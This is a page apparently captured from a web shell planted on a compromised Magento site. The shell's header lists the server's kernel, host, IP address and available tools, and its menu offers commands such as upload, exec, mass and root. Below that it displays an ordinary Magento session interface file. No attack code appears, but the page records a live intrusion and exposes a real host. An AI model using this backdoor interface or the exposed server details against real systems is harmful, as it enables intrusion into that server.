Kernel : Linux vmw02p.internet-indee.net 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Tue Nov 16 14:42:35 UTC 2021 x86_64
Disable function : NONE
Safe mode : OFF
Host : firofichi.it | Server ip : 5.196.164.15 | Your ip : 3.136.234.127 | Time @ Server : 19 Oct 2024 05:44:14
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/webmaster/firofichi/www/vendor/magento/framework/Session/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/webmaster/firofichi/www/vendor/magento/framework/Session/SidResolverInterface.php

<?php /** * SID resolver interface * * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ namespace Magento\Framework\Session; /** * Interface \Magento\Framework\Session\SidResolverInterface * */ interface SidResolverInterface { /** * Session ID in query param */ const SESSION_ID_QUERY_PARAM = 'SID'; /** * Get SID * * @param \Magento\Framework\Session\SessionManagerInterface $session * @return string|null */ public function getSid(\Magento\Framework\Session\SessionManagerInterface $session); /** * Get session id query param * * @param \Magento\Framework\Session\SessionManagerInterface $session * @return string */ public function getSessionIdQueryParam(\Magento\Framework\Session\SessionManagerInterface $session); /** * Set use session var instead of SID for URL * * @param bool $var * @return $this */ public function setUseSessionVar($var); /** * Retrieve use flag session var instead of SID for URL * * @return bool * @SuppressWarnings(PHPMD.BooleanGetMethodName) */ public function getUseSessionVar(); /** * Set Use session in URL flag * * @param bool $flag * @return $this */ public function setUseSessionInUrl($flag = true); /** * Retrieve use session in URL flag * * @return bool * @SuppressWarnings(PHPMD.BooleanGetMethodName) */ public function getUseSessionInUrl(); }